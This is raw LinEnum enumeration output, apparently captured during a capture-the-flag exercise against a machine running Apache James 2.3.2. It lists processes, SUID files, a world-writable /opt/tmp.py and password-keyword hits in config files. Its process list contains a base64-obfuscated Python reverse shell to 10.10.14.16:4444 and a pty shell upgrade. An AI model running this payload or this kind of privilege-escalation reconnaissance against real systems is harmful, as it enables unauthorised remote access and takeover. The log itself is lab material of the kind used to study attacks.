root 2 0.0 0.0 0 0 ? S 10:38 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S 10:38 0:00 [ksoftirqd/0] root 5 0.0 0.0 0 0 ? S< 10:38 0:00 [kworker/0:0H] root 6 0.0 0.0 0 0 ? S 10:38 0:00 [kworker/u2:0] root 7 0.0 0.0 0 0 ? S 10:38 0:00 [rcu_sched] root 8 0.0 0.0 0 0 ? S 10:38 0:00 [rcu_bh] root 9 0.0 0.0 0 0 ? S 10:38 0:00 [migration/0] root 10 0.0 0.0 0 0 ? S< 10:38 0:00 [lru-add-drain] root 11 0.0 0.0 0 0 ? S 10:38 0:00 [watchdog/0] root 12 0.0 0.0 0 0 ? S 10:38 0:00 [cpuhp/0] root 13 0.0 0.0 0 0 ? S 10:38 0:00 [kdevtmpfs] root 14 0.0 0.0 0 0 ? S< 10:38 0:00 [netns] root 15 0.0 0.0 0 0 ? S 10:38 0:00 [khungtaskd] root 16 0.0 0.0 0 0 ? S 10:38 0:00 [oom_reaper] root 17 0.0 0.0 0 0 ? S< 10:38 0:00 [writeback] root 18 0.0 0.0 0 0 ? S 10:38 0:00 [kcompactd0] root 19 0.0 0.0 0 0 ? SN 10:38 0:00 [ksmd] root 21 0.0 0.0 0 0 ? S< 10:38 0:00 [crypto] root 22 0.0 0.0 0 0 ? S< 10:38 0:00 [kintegrityd] root 23 0.0 0.0 0 0 ? S< 10:38 0:00 [bioset] root 24 0.0 0.0 0 0 ? S< 10:38 0:00 [kblockd] root 25 0.0 0.0 0 0 ? S< 10:38 0:00 [devfreq_wq] root 26 0.0 0.0 0 0 ? S< 10:38 0:00 [watchdogd] root 27 0.0 0.0 0 0 ? S 10:38 0:00 [kswapd0] root 28 0.0 0.0 0 0 ? S< 10:38 0:00 [vmstat] root 40 0.0 0.0 0 0 ? S< 10:38 0:00 [kthrotld] root 42 0.0 0.0 0 0 ? S< 10:38 0:00 [ipv6_addrconf] root 82 0.0 0.0 0 0 ? S< 10:38 0:00 [ata_sff] root 84 0.0 0.0 0 0 ? S< 10:38 0:00 [mpt_poll_0] root 85 0.0 0.0 0 0 ? S< 10:38 0:00 [mpt/0] root 104 0.0 0.0 0 0 ? S 10:38 0:00 [scsi_eh_0] root 105 0.0 0.0 0 0 ? S< 10:38 0:00 [scsi_tmf_0] root 106 0.0 0.0 0 0 ? S 10:38 0:00 [scsi_eh_1] root 107 0.0 0.0 0 0 ? S< 10:38 0:00 [bioset] root 109 0.0 0.0 0 0 ? S< 10:38 0:00 [scsi_tmf_1] root 111 0.0 0.0 0 0 ? S 10:38 0:00 [scsi_eh_2] root 113 0.0 0.0 0 0 ? S< 10:38 0:00 [scsi_tmf_2] root 115 0.0 0.0 0 0 ? S 10:38 0:00 [kworker/u2:2] root 128 0.0 0.0 0 0 ? S< 10:38 0:00 [bioset] root 130 0.0 0.0 0 0 ? S< 10:38 0:00 [kworker/0:1H] root 166 0.0 0.0 0 0 ? S 10:38 0:00 [jbd2/sda1-8] root 167 0.0 0.0 0 0 ? S< 10:38 0:00 [ext4-rsv-conver] root 196 0.0 0.8 24792 4312 ? Ss 10:38 0:00 /lib/systemd/systemd-journald root 201 0.0 0.0 0 0 ? S 10:38 0:00 [kauditd] root 219 0.0 0.5 16084 3012 ? Ss 10:38 0:00 /lib/systemd/systemd-udevd systemd+ 271 0.0 0.7 16964 3888 ? Ssl 10:38 0:00 /lib/systemd/systemd-timesyncd root 273 0.0 0.0 0 0 ? S< 10:38 0:00 [nfit] root 276 0.0 0.0 0 0 ? S< 10:38 0:00 [ttm_swap] root 366 0.0 1.0 50876 5456 ? Ssl 10:38 0:00 /usr/sbin/ModemManager root 368 0.0 0.4 5264 2512 ? Ss 10:38 0:00 /usr/sbin/cron -f root 370 0.0 0.0 2332 444 ? Ss 10:38 0:00 /bin/sh /opt/james-2.3.2/bin/run.sh message+ 372 0.0 0.7 6836 4040 ? Ss 10:38 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation root 380 0.1 8.1 441760 41628 ? Sl 10:38 0:09 /usr/lib/jvm/java-8-openjdk-i386//bin/java -Djava.ext.dirs=/opt/james-2.3.2/lib:/opt/james-2.3.2/tools/lib -Djava.security.manager -Djava.security.policy=jar:file:/opt/james-2.3.2/bin/phoenix-loader.jar!/META-INF/java.policy -Dnetworkaddress.cache.ttl=300 -Dphoenix.home=/opt/james-2.3.2 -Djava.io.tmpdir=/opt/james-2.3.2/temp -jar /opt/james-2.3.2/bin/phoenix-loader.jar root 404 0.0 2.1 84144 10796 ? Ssl 10:38 0:00 /usr/sbin/NetworkManager --no-daemon root 406 0.0 1.1 38336 5896 ? Ssl 10:38 0:00 /usr/lib/accountsservice/accounts-daemon root 407 0.0 0.8 7432 4204 ? Ss 10:38 0:00 /lib/systemd/systemd-logind avahi 408 0.0 0.5 6256 2964 ? Ss 10:38 0:03 avahi-daemon: running [solidstate.local] rtkit 409 0.0 0.5 24100 2720 ? SNsl 10:38 0:00 /usr/lib/rtkit/rtkit-daemon root 411 0.0 0.5 23108 2684 ? Ssl 10:38 0:00 /usr/sbin/rsyslogd -n root 418 0.0 1.5 38624 7692 ? Ssl 10:38 0:00 /usr/lib/policykit-1/polkitd --no-debug avahi 424 0.0 0.0 6256 60 ? S 10:38 0:00 avahi-daemon: chroot helper root 532 0.0 0.9 10472 5088 ? Ss 10:38 0:00 /usr/sbin/sshd -D root 539 0.0 0.0 2236 60 ? Ss 10:38 0:00 /usr/sbin/minissdpd -i 0.0.0.0 root 553 0.0 1.3 40204 6696 ? Ssl 10:38 0:00 /usr/sbin/gdm3 root 562 0.0 1.3 31512 6820 ? Sl 10:38 0:00 gdm-session-worker [pam/gdm-launch-environment] root 580 0.0 0.7 6408 3676 ? Ss 10:38 0:00 /usr/sbin/apache2 -k start www-data 583 0.0 0.6 228916 3280 ? Sl 10:38 0:01 /usr/sbin/apache2 -k start www-data 584 0.0 0.6 228916 3280 ? Sl 10:38 0:01 /usr/sbin/apache2 -k start Debian-+ 639 0.0 1.1 9456 5788 ? Ss 10:38 0:00 /lib/systemd/systemd --user Debian-+ 640 0.0 0.1 10560 812 ? S 10:38 0:00 (sd-pam) Debian-+ 644 0.0 0.8 27632 4284 tty1 Ssl+ 10:38 0:00 /usr/lib/gdm3/gdm-wayland-session gnome-session --autostart /usr/share/gdm/greeter/autostart Debian-+ 646 0.0 0.7 6368 3680 ? Ss 10:38 0:00 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation Debian-+ 648 0.0 1.9 75152 9844 tty1 Sl+ 10:38 0:00 /usr/lib/gnome-session/gnome-session-binary --autostart /usr/share/gdm/greeter/autostart Debian-+ 681 0.1 21.8 825052 111300 tty1 Sl+ 10:38 0:12 /usr/bin/gnome-shell root 687 0.0 1.4 50320 7400 ? Ssl 10:38 0:00 /usr/lib/upower/upowerd Debian-+ 711 0.0 4.7 81916 24416 tty1 S+ 10:38 0:00 /usr/bin/Xwayland :1024 -rootless -noreset -listen 4 -listen 5 -displayfd 6 Debian-+ 730 0.0 1.1 44412 5888 ? Ssl 10:38 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher Debian-+ 735 0.0 0.6 6260 3308 ? S 10:38 0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 3 Debian-+ 737 0.0 1.1 30484 5956 ? Sl 10:38 0:00 /usr/lib/at-spi2-core/at-spi2-registryd --use-gnome-session Debian-+ 741 0.0 1.8 888536 9564 ? Ssl 10:38 0:00 /usr/bin/pulseaudio --daemonize=no root 780 0.0 0.9 10772 4624 ? Ss 10:38 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant root 781 0.0 2.1 46496 10996 ? Ssl 10:38 0:00 /usr/lib/packagekit/packagekitd Debian-+ 782 0.0 7.5 448652 38464 tty1 Sl+ 10:38 0:00 /usr/lib/gnome-settings-daemon/gnome-settings-daemon colord 799 0.0 2.6 45664 13308 ? Ssl 10:38 0:00 /usr/lib/colord/colord root 965 0.0 1.3 14652 6772 ? Ss 10:43 0:00 /usr/sbin/cupsd -l root 967 0.0 1.3 35424 6848 ? Ssl 10:43 0:00 /usr/sbin/cups-browsed root 1319 0.0 0.0 0 0 ? S 12:34 0:00 [kworker/0:1] root 1332 0.0 0.0 0 0 ? S 12:39 0:00 [kworker/0:2] root 1338 0.0 1.2 11156 6292 ? Ss 12:43 0:00 sshd: mindy [priv] mindy 1340 0.0 1.1 9488 5632 ? Ss 12:43 0:00 /lib/systemd/systemd --user mindy 1341 0.0 0.2 28008 1028 ? S 12:43 0:00 (sd-pam) mindy 1349 0.0 0.7 11156 3708 ? S 12:43 0:00 sshd: mindy@pts/0 mindy 1350 0.0 0.7 6464 4024 pts/0 Ss+ 12:43 0:00 -rbash mindy 1369 0.0 1.6 13380 8536 pts/0 S+ 12:43 0:00 python -c exec('aW1wb3J0IHNvY2tldCAgICwgIHN1YnByb2Nlc3MgICAsICBvcyAgICAgICAgIDsgICAgICAgaG9zdD0iMTAuMTAuMTQuMTYiICAgICAgICAgOyAgICAgICBwb3J0PTQ0NDQgICAgICAgICA7ICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICwgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgICA7ICAgICAgIHMuY29ubmVjdCgoaG9zdCAgICwgIHBvcnQpKSAgICAgICAgIDsgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgMCkgICAgICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICwgIDEpICAgICAgICAgOyAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAyKSAgICAgICAgIDsgICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64')) mindy 1370 0.0 0.6 5236 3080 pts/0 S+ 12:43 0:00 /bin/bash root 1374 0.0 0.0 0 0 ? S 12:44 0:00 [kworker/0:0] mindy 1375 0.0 1.1 10140 5740 pts/0 S+ 12:44 0:00 python -c import pty; pty.spawn("/bin/bash") mindy 1376 0.0 0.7 5660 3584 pts/1 Ss 12:44 0:00 /bin/bash mindy 1397 0.3 0.5 5324 2920 pts/1 S+ 12:49 0:00 /bin/bash ./LinEnum.sh -t -k password mindy 1751 0.0 0.3 5300 1964 pts/1 S+ 12:49 0:00 /bin/bash ./LinEnum.sh -t -k password mindy 1752 0.0 0.6 7672 3200 pts/1 R+ 12:49 0:00 ps aux . . Process binaries & associated permissions (from above list): 936K -rwxr-xr-x 1 root root 935K Jun 17 2017 /usr/sbin/sshd 696K -rwxr-xr-x 1 root root 695K Jan 18 2017 /usr/sbin/rsyslogd 2.7M -rwxr-xr-x 1 root root 2.7M Mar 18 2017 /usr/sbin/NetworkManager 1.4M -rwxr-xr-x 1 root root 1.4M Nov 16 2016 /usr/sbin/ModemManager 32K -rwxr-xr-x 1 root root 30K May 8 2017 /usr/sbin/minissdpd 432K -rwxr-xr-x 1 root root 432K Jun 6 2017 /usr/sbin/gdm3 496K -rwxr-xr-x 1 root root 494K Jan 31 2017 /usr/sbin/cupsd 172K -rwxr-xr-x 1 root root 170K Jan 19 2017 /usr/sbin/cups-browsed 48K -rwxr-xr-x 1 root root 47K May 3 2015 /usr/sbin/cron 636K -rwxr-xr-x 1 root root 633K Jul 18 2017 /usr/sbin/apache2 248K -rwxr-xr-x 1 root root 246K Sep 19 2016 /usr/lib/upower/upowerd 64K -rwxr-xr-x 1 root root 63K Oct 24 2015 /usr/lib/rtkit/rtkit-daemon 16K -rwxr-xr-x 1 root root 14K May 24 2017 /usr/lib/policykit-1/polkitd 308K -rwxr-xr-x 1 root root 306K Mar 8 2017 /usr/lib/packagekit/packagekitd 0 lrwxrwxrwx 1 root root 15 Jul 23 08:12 /usr/lib/jvm/java-8-openjdk-i386//bin/java -> ../jre/bin/java
40K -rwxr-xr-x 1 root root 39K Apr 24 2017 /usr/lib/gnome-settings-daemon/gnome-settings-daemon
312K -rwxr-xr-x 1 root root 312K Mar 9 2017 /usr/lib/gnome-session/gnome-session-binary
60K -rwxr-xr-x 1 root root 59K Jun 6 2017 /usr/lib/gdm3/gdm-wayland-session
324K -rwxr-xr-x 1 root root 322K Sep 6 2016 /usr/lib/colord/colord
20K -rwxr-xr-x 1 root root 18K May 9 2017 /usr/lib/at-spi2-core/at-spi-bus-launcher
92K -rwxr-xr-x 1 root root 89K May 9 2017 /usr/lib/at-spi2-core/at-spi2-registryd
156K -rwxr-xr-x 1 root root 155K Dec 29 2016 /usr/lib/accountsservice/accounts-daemon
2.4M -rwxr-xr-x 1 root root 2.4M Jul 7 2017 /usr/bin/Xwayland
88K -rwxr-xr-x 1 root root 86K Jan 19 2017 /usr/bin/pulseaudio
16K -rwxr-xr-x 1 root root 14K Apr 26 2017 /usr/bin/gnome-shell
256K -rwxr-xr-x 1 root root 254K Apr 5 2017 /usr/bin/dbus-daemon
2.4M -rwxr-xr-x 1 root root 2.4M Feb 20 2017 /sbin/wpa_supplicant
0 lrwxrwxrwx 1 root root 20 Jun 4 2017 /sbin/init -> /lib/systemd/systemd
452K -rwxr-xr-x 1 root root 450K Jun 4 2017 /lib/systemd/systemd-udevd
40K -rwxr-xr-x 1 root root 38K Jun 4 2017 /lib/systemd/systemd-timesyncd
208K -rwxr-xr-x 1 root root 206K Jun 4 2017 /lib/systemd/systemd-logind
116K -rwxr-xr-x 1 root root 114K Jun 4 2017 /lib/systemd/systemd-journald
1.1M -rwxr-xr-x 1 root root 1.1M Jun 4 2017 /lib/systemd/systemd
0 lrwxrwxrwx 1 root root 4 Jan 24 2017 /bin/sh -> dash
1.3M -rwxr-xr-x 1 root root 1.3M May 15 2017 /bin/bash
.
.
/etc/init.d/ binary permissions:
total 148
drwxr-xr-x 2 root root 4096 Aug 22 13:21 .
drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
-rwxr-xr-x 1 root root 5336 Feb 1 2016 alsa-utils
-rwxr-xr-x 1 root root 2014 May 29 2017 anacron
-rwxr-xr-x 1 root root 8181 Jul 18 2017 apache2
-rwxr-xr-x 1 root root 2225 Jul 18 2017 apache-htcacheclean
-rwxr-xr-x 1 root root 2401 Jan 23 2017 avahi-daemon
-rwxr-xr-x 1 root root 2948 Oct 24 2016 bluetooth
-rwxr-xr-x 1 root root 1232 Apr 6 2017 console-setup.sh
-rwxr-xr-x 1 root root 3049 May 3 2015 cron
-rwxr-xr-x 1 root root 2816 Jan 18 2017 cups
-rwxr-xr-x 1 root root 1961 Jan 19 2017 cups-browsed
-rwxr-xr-x 1 root root 2813 Apr 5 2017 dbus
-rwxr-xr-x 1 root root 3033 May 20 2014 gdm3
-rwxr-xr-x 1 root root 3809 Mar 22 2017 hwclock.sh
-rwxr-xr-x 1 root root 1479 May 18 2016 keyboard-setup.sh
-rwxr-xr-x 1 root root 2044 Dec 25 2016 kmod
-rwxr-xr-x 1 root root 2241 Apr 26 2017 minissdpd
-rwxr-xr-x 1 root root 4597 Sep 16 2016 networking
-rwxr-xr-x 1 root root 1757 Mar 18 2017 network-manager
-rwxr-xr-x 1 root root 612 Dec 4 2015 pppd-dns
-rwxr-xr-x 1 root root 1191 Nov 22 2016 procps
-rwxr-xr-x 1 root root 4355 Jul 10 2014 rsync
-rwxr-xr-x 1 root root 2868 Jan 18 2017 rsyslog
-rwxr-xr-x 1 root root 2330 May 21 2017 saned
-rwxr-xr-x 1 root root 2117 Jan 9 2017 speech-dispatcher
-rwxr-xr-x 1 root root 4033 Jun 17 2017 ssh
-rwxr-xr-x 1 root root 6087 Jun 4 2017 udev
-rwxr-xr-x 1 root root 1391 May 6 2017 unattended-upgrades
-rwxr-xr-x 1 root root 2757 Nov 23 2016 x11-common
.
.
### SOFTWARE #############################################
Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
.
.
Anything in the Apache home dirs?:
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Aug 22 13:21 .
drwxr-xr-x 12 root root 4.0K Aug 22 13:21 ..
drwxr-xr-x 4 root root 4.0K Aug 22 13:31 html
.
/var/www/html:
total 68K
drwxr-xr-x 4 root root 4.0K Aug 22 13:31 .
drwxr-xr-x 3 root root 4.0K Aug 22 13:21 ..
-rw-r--r-- 1 root root 7.1K Jul 18 2017 about.html
drwxr-xr-x 6 root root 4.0K Jul 18 2017 assets
drwxr-xr-x 2 root root 4.0K Jul 18 2017 images
-rw-r--r-- 1 root root 7.6K Aug 22 13:31 index.html
-rw-r--r-- 1 root root 17K Jul 18 2017 LICENSE.txt
-rw-r--r-- 1 root root 963 Jul 18 2017 README.txt
-rw-r--r-- 1 root root 8.3K Jul 18 2017 services.html
.
/var/www/html/assets:
total 24K
drwxr-xr-x 6 root root 4.0K Jul 18 2017 .
drwxr-xr-x 4 root root 4.0K Aug 22 13:31 ..
drwxr-xr-x 3 root root 4.0K Jul 18 2017 css
drwxr-xr-x 2 root root 4.0K Jul 18 2017 fonts
drwxr-xr-x 3 root root 4.0K Jul 18 2017 js
drwxr-xr-x 6 root root 4.0K Jul 18 2017 sass
.
/var/www/html/assets/css:
total 124K
drwxr-xr-x 3 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 29K Jul 18 2017 font-awesome.min.css
-rw-r--r-- 1 root root 2.5K Jul 18 2017 ie8.css
-rw-r--r-- 1 root root 1.3K Jul 18 2017 ie9.css
drwxr-xr-x 2 root root 4.0K Jul 18 2017 images
-rw-r--r-- 1 root root 71K Jul 18 2017 main.css
.
/var/www/html/assets/css/images:
total 12K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 3 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 246 Jul 18 2017 close.svg
.
/var/www/html/assets/fonts:
total 908K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 123K Jul 18 2017 FontAwesome.otf
-rw-r--r-- 1 root root 75K Jul 18 2017 fontawesome-webfont.eot
-rw-r--r-- 1 root root 383K Jul 18 2017 fontawesome-webfont.svg
-rw-r--r-- 1 root root 150K Jul 18 2017 fontawesome-webfont.ttf
-rw-r--r-- 1 root root 89K Jul 18 2017 fontawesome-webfont.woff
-rw-r--r-- 1 root root 71K Jul 18 2017 fontawesome-webfont.woff2
.
/var/www/html/assets/js:
total 144K
drwxr-xr-x 3 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
drwxr-xr-x 2 root root 4.0K Jul 18 2017 ie
-rw-r--r-- 1 root root 94K Jul 18 2017 jquery.min.js
-rw-r--r-- 1 root root 2.3K Jul 18 2017 jquery.scrollex.min.js
-rw-r--r-- 1 root root 3.2K Jul 18 2017 main.js
-rw-r--r-- 1 root root 8.9K Jul 18 2017 skel.min.js
-rw-r--r-- 1 root root 13K Jul 18 2017 util.js
.
/var/www/html/assets/js/ie:
total 68K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 3 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 3.8K Jul 18 2017 backgroundsize.min.htc
-rw-r--r-- 1 root root 2.4K Jul 18 2017 html5shiv.js
-rw-r--r-- 1 root root 41K Jul 18 2017 PIE.htc
-rw-r--r-- 1 root root 4.5K Jul 18 2017 respond.min.js
.
/var/www/html/assets/sass:
total 36K
drwxr-xr-x 6 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
drwxr-xr-x 2 root root 4.0K Jul 18 2017 base
drwxr-xr-x 2 root root 4.0K Jul 18 2017 components
-rw-r--r-- 1 root root 2.8K Jul 18 2017 ie8.scss
-rw-r--r-- 1 root root 1.6K Jul 18 2017 ie9.scss
drwxr-xr-x 2 root root 4.0K Jul 18 2017 layout
drwxr-xr-x 2 root root 4.0K Jul 18 2017 libs
-rw-r--r-- 1 root root 1.3K Jul 18 2017 main.scss
.
/var/www/html/assets/sass/base:
total 16K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 1.2K Jul 18 2017 _page.scss
-rw-r--r-- 1 root root 4.0K Jul 18 2017 _typography.scss
.
/var/www/html/assets/sass/components:
total 48K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 517 Jul 18 2017 _box.scss
-rw-r--r-- 1 root root 1.8K Jul 18 2017 _button.scss
-rw-r--r-- 1 root root 1.9K Jul 18 2017 _features.scss
-rw-r--r-- 1 root root 3.8K Jul 18 2017 _form.scss
-rw-r--r-- 1 root root 288 Jul 18 2017 _icon.scss
-rw-r--r-- 1 root root 889 Jul 18 2017 _image.scss
-rw-r--r-- 1 root root 4.8K Jul 18 2017 _list.scss
-rw-r--r-- 1 root root 249 Jul 18 2017 _section.scss
-rw-r--r-- 1 root root 1.3K Jul 18 2017 _table.scss
.
/var/www/html/assets/sass/layout:
total 32K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 3.2K Jul 18 2017 _banner.scss
-rw-r--r-- 1 root root 2.9K Jul 18 2017 _footer.scss
-rw-r--r-- 1 root root 2.7K Jul 18 2017 _header.scss
-rw-r--r-- 1 root root 2.8K Jul 18 2017 _menu.scss
-rw-r--r-- 1 root root 6.2K Jul 18 2017 _wrapper.scss
.
/var/www/html/assets/sass/libs:
total 48K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 787 Jul 18 2017 _functions.scss
-rw-r--r-- 1 root root 9.2K Jul 18 2017 _mixins.scss
-rw-r--r-- 1 root root 17K Jul 18 2017 _skel.scss
-rw-r--r-- 1 root root 1.1K Jul 18 2017 _vars.scss
.
/var/www/html/images:
total 784K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 4 root root 4.0K Aug 22 13:31 ..
-rw-r--r-- 1 root root 11K Jul 18 2017 bg.jpg
-rw-r--r-- 1 root root 14K Jul 18 2017 pic01.jpg
-rw-r--r-- 1 root root 330K Jul 18 2017 pic02.jpg
-rw-r--r-- 1 root root 7.6K Jul 18 2017 pic03.jpg
-rw-r--r-- 1 root root 116K Jul 18 2017 pic04.jpg
-rw-r--r-- 1 root root 57K Jul 18 2017 pic05.jpg
-rw-r--r-- 1 root root 183K Jul 18 2017 pic06.jpg
-rw-r--r-- 1 root root 33K Jul 18 2017 pic07.jpg
-rw-r--r-- 1 root root 9.9K Jul 18 2017 pic08.jpg
.
.
### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
.
.
Installed compilers:
ii libllvm3.9:i386 1:3.9.1-9 i386 Modular compiler and toolchain technologies, runtime library
ii libxkbcommon0:i386 0.7.1-1 i386 library interface to the XKB compiler - shared library
.
.
Can we read/write sensitive files:
-rw-r--r-- 1 root root 2107 Aug 22 13:52 /etc/passwd
-rw-r--r-- 1 root root 909 Aug 22 11:37 /etc/group
-rw-r--r-- 1 root root 767 Mar 4 2016 /etc/profile
-rw-r----- 1 root shadow 1375 Aug 22 11:39 /etc/shadow
.
.
SUID files:
-rwsr-xr-x 1 root root 39144 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 38940 Mar 22 2017 /bin/mount
-rwsr-xr-x 1 root root 30112 Jun 23 2016 /bin/fusermount
-rwsr-xr-x 1 root root 68076 Nov 10 2016 /bin/ping
-rwsr-xr-x 1 root root 161520 Feb 26 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26504 Mar 22 2017 /bin/umount
-rwsr-xr-x 1 root root 34920 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 22304 May 24 2017 /usr/bin/pkexec
-rwsr-xr-x 1 root root 57972 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 39632 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 48560 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 78340 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-- 1 root dip 363140 Nov 11 2016 /usr/sbin/pppd
-rwsr-xr-x 1 root root 13960 May 24 2017 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 525932 Jun 17 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5480 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 46436 Apr 5 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 9772 Jul 7 2017 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 13672 Jan 14 2017 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
.
.
GUID files:
-rwxr-sr-x 1 root shadow 34568 May 27 2017 /sbin/unix_chkpwd
-rwxr-sr-x 1 root tty 26416 Mar 22 2017 /usr/bin/wall
-rwxr-sr-x 1 root shadow 22040 May 17 2017 /usr/bin/expiry
-rwxr-sr-x 1 root tty 9820 Apr 12 2017 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 66120 May 17 2017 /usr/bin/chage
-rwxr-sr-x 1 root crontab 39056 May 3 2015 /usr/bin/crontab
-rwxr-sr-x 1 root mail 18084 Jan 17 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root ssh 431632 Jun 17 2017 /usr/bin/ssh-agent
-rwxr-sr-x 1 root utmp 5480 Feb 18 2016 /usr/lib/i386-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root mail 13680 Mar 23 2017 /usr/lib/evolution/camel-lock-helper-1.2
-rwsr-sr-x 1 root root 9772 Jul 7 2017 /usr/lib/xorg/Xorg.wrap
.
.
World-writable files (excluding /proc):
-rwxrwxrwx 1 root root 105 Aug 22 13:32 /opt/tmp.py
--w--w--w- 1 root root 0 Jan 17 12:49 /sys/fs/cgroup/memory/cgroup.event_control
.
.
rhost config file(s) and file contents:
-rw------- 1 root root 0 Aug 22 13:41 /home/mindy/.rhosts
.
.
Find keyword (password) in .conf files (recursive 4 levels - output format filepath:identified line number where keyword appears):
/etc/cracklib/cracklib.conf:17:# passwords should not match. The files may optionally be compressed
/etc/reportbug.conf:71:# Username and password for SMTP
/etc/apache2/sites-available/default-ssl.conf:78: # Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf:79: # file needs this password: `xxj31ZMTZzkVA'.
/etc/security/pwquality.conf:1:# Configuration for systemwide password quality limits
/etc/security/pwquality.conf:4:# Number of characters in the new password that must not be present in the
/etc/security/pwquality.conf:5:# old password.
/etc/security/pwquality.conf:8:# Minimum acceptable size for the new password (plus one if
/etc/security/pwquality.conf:13:# The maximum credit for having digits in the new password. If less than 0
/etc/security/pwquality.conf:14:# it is the minimum number of digits in the new password.
/etc/security/pwquality.conf:17:# The maximum credit for having uppercase characters in the new password.
/etc/security/pwquality.conf:19:# password.
/etc/security/pwquality.conf:22:# The maximum credit for having lowercase characters in the new password.
/etc/security/pwquality.conf:24:# password.
/etc/security/pwquality.conf:27:# The maximum credit for having other characters in the new password.
/etc/security/pwquality.conf:29:# password.
/etc/security/pwquality.conf:33:# password (digits, uppercase, lowercase, others).
/etc/security/pwquality.conf:36:# The maximum number of allowed consecutive same characters in the new password.
/etc/security/pwquality.conf:41:# new password.
/etc/hdparm.conf:86:# --security-set-pass Set security password
/etc/hdparm.conf:87:# security_pass = password
/etc/hdparm.conf:90:# --user-master Select password to use
/etc/debconf.conf:14:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:18:Reject-Type: password
/etc/debconf.conf:21:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:22:Name: passwords
/etc/debconf.conf:27:Accept-Type: password
/etc/debconf.conf:28:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:31:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:34:Stack: config, passwords
/etc/debconf.conf:58:# A remote LDAP database. It is also read-only. The password is really
/etc/apg.conf:6:#Pronounceable passwords with special characters:
/etc/apg.conf:9:#Pronounceable passwords without special characters:
/etc/apg.conf:12:#Random passwords:
/usr/lib/tmpfiles.d/passwd.conf:1:# If a password operation is in progress and we lose power, stale lockfiles
/usr/lib/tmpfiles.d/systemd.conf:13:d /run/systemd/ask-password 0755 root root -
/usr/lib/realmd/realmd-defaults.conf:43:example-password = bureaucracy
/usr/share/debconf/debconf.conf:8:Reject-Type: password
/usr/share/debconf/debconf.conf:11:Name: passwords
/usr/share/debconf/debconf.conf:16:Accept-Type: password
/usr/share/debconf/debconf.conf:17:Filename: /var/cache/debconf/passwords.dat
/usr/share/debconf/debconf.conf:21:Stack: config, passwords
.
.
Find keyword (password) in .log files (recursive 2 levels):
'password' not found in any .log files
.
.
Find keyword (password) in .ini files (recursive 2 levels):
'password' not found in any .ini files
.
.
All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 973 Jan 31 2017 /etc/mke2fs.conf
-rw-r--r-- 1 root root 1018 Jan 23 2017 /etc/usb_modeswitch.conf
-rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
-rw-r--r-- 1 root root 2683 Nov 22 2016 /etc/sysctl.conf
-rw-r--r-- 1 root root 191 Apr 12 2017 /etc/libaudit.conf
-rw-r--r-- 1 root root 1343 Jan 9 2007 /etc/wodim.conf
